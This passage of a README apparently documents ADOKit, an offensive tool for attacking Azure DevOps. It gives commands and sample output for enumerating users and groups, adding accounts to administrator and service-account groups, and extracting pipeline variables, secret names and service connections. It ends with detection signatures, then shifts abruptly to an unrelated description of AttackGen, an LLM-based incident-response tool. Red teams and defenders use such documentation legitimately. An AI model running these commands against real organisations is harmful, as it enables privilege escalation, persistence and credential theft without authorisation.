Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:07 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | [email protected]
jsmith | John Smith | [email protected]
rsmith | Ron Smith | [email protected]
user2 | User 2 | [email protected]

4/3/23 20:12:08 Finished execution of listuser

Search User

Use Case

Search for given user(s) in Azure DevOps instance

Syntax

Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

Example Output

C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:23 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | [email protected] rosoft.com
user2 | User 2 | [email protected]

4/3/23 20:12:24 Finished execution of searchuser

List Groups

Use Case

List groups within an Azure DevOps instance

Syntax

Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:45 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


---SNIP---

4/3/23 20:48:46 Finished execution of listgroup

Search Groups

Use Case

Search for given group(s) in Azure DevOps instance

Syntax

Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

Example Output

C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:41 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

4/3/23 20:48:42 Finished execution of searchgroup

Get Group Members

Use Case

List all group members for a given group

Syntax

Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.

ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

Example Output

C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:03 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | [email protected] | User 1
[TestProject2]\Build Administrators | [email protected] | User 2
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Project Administrators | [email protected] | Ron Smith
[TestProject2]\Project Administrators | [email protected] | User 1
[TestProject2]\Project Administrators | [email protected] | User 2
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
[ProjectWithMultipleRepos]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Build Administrators | [email protected] | Brett Hawkins

4/4/23 13:11:09 Finished execution of getgroupmembers

Get Project Permissions

Use Case

Get a listing of who has permissions to a given project.

Syntax

Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.

ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

Example Output

C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:16 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


[*] INFO: List ing group members for each group that has permissions to this project



GROUP NAME: [MaraudersMap]\Build Administrators

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


GROUP NAME: [MaraudersMap]\Contributors

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributo rs | [email protected] | User 1
[MaraudersMap]\Contributors | [email protected] | User 2


GROUP NAME: [MaraudersMap]\MaraudersMap Team

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | [email protected] | Brett Hawkins


GROUP NAME: [MaraudersMap]\Project Administrators

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins


GROUP NAME: [MaraudersMap]\Project Valid Users

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


GROUP NAME: [MaraudersMap]\Readers

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | [email protected] | John Smith

4/4/23 13:11:18 Finished execution of getpermissions

Add Project Admin

Use Case

Add a user to the Project Administrators group for a given project.

Syntax

Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 2:52:45 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Project Administrators | [email protected] | User 1

4/4/23 18:52:47 Finished execution of addprojectadmin

Remove Project Admin

Use Case

Remove a user from the Project Administrators group for a given project.

Syntax

Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:19:43 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins

4/4/23 19:19:44 Finished execution of removeprojectadmin

Add Build Admin

Use Case

Add a user to the Build Administrators group for a given project.

Syntax

Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:41:51 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | [email protected] | User 1

4/4/23 19:41:55 Finished execution of addbuildadmin

Remove Build Admin

Use Case

Remove a user from the Build Administrators group for a given project.

Syntax

Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:42:10 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------

4/4/23 19:42:11 Finished execution of removebuildadmin

Add Collection Admin

Use Case

Add a user to the Project Collection Administrators group.

Syntax

Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:04:40 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
[YourOrganization]\Project Collection Administrators | [email protected] | User 1

4/4/23 20:04:43 Finished execution of addcollectionadmin

Remove Collection Admin

Use Case

Remove a user from the Project Collection Administrators group.

Syntax

Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:10:35 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith

4/4/23 20:10:38 Finished execution of removecollectionadmin

Add Collection Build Admin

Use Case

Add a user to the Project Collection Build Administrators group.

Syntax

Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:39 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | [email protected] | User 1

4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

Remove Collection Build Admin

Use Case

Remove a user from the Project Collection Build Administrators group.

Syntax

Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

Add Collection Build Service Account

Use Case

Add a user to the Project Collection Build Service Accounts group.

Syntax

Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:13 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | [email protected] | User 1

4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

Remove Collection Build Service Account

Use Case

Remove a user from the Project Collection Build Service Accounts group.

Syntax

Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:27 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

Add Collection Service Account

Use Case

Add a user to the Project Collection Service Accounts group.

Syntax

Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:01 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | [email protected] | John Smith
[YourOrganization]\Project Collection Service Accounts | [email protected] | User 1

4/5/23 15:21:04 Finished execution of addcollectionsvc

Remove Collection Service Account

Use Case

Remove a user from the Project Collection Service Accounts group.

Syntax

Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:43 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | [email protected] | John Smith

4/5/23 15:21:44 Finished execution of removecollectionsvc

Get Pipeline Variables

Use Case

Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

Syntax

Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all in the /project: argument.

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/6/2023 12:08:35 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/

4/6/23 16:08:36 Finished execution of getpipelinevars

Get Pipeline Secrets

Use Case

Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.

Syntax

Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all in the /project: argument.

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/10/2023 10:28:37 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]

4/10/23 14:28:38 Finished execution of getpipelinesecrets

Get Service Connections

Use Case

List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.

Syntax

Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all in the /project: argument.

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/11/2023 8:34:16 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

4/11/23 12:34:16 Finished execution of getserviceconnections

Detection

Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
  • See ADOKit Yara Rule in this repo.
  • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
  • See ADOKit Snort Rule in this repo.
  • Microsoft Sentinel Rules
  • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
  • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.

Roadmap

  • Support for Azure DevOps Server

References

  • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
  • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework


AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


Star the Repo

If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

Features

  • Generates unique incident response scenarios based on chosen threat actor groups.
  • Allows you to specify your organisation's size and industry for a tailored scenario.
  • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
  • Create custom scenarios based on a selection of ATT&CK techniques.
  • Capture user feedback on the quality of the generated scenarios.
  • Downloadable scenarios in Markdown format.
  • 🆕 Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
  • Available as a Docker container image for easy deployment.
  • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


Releases

v0.4 (current)

What's new? Why is it useful?
Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
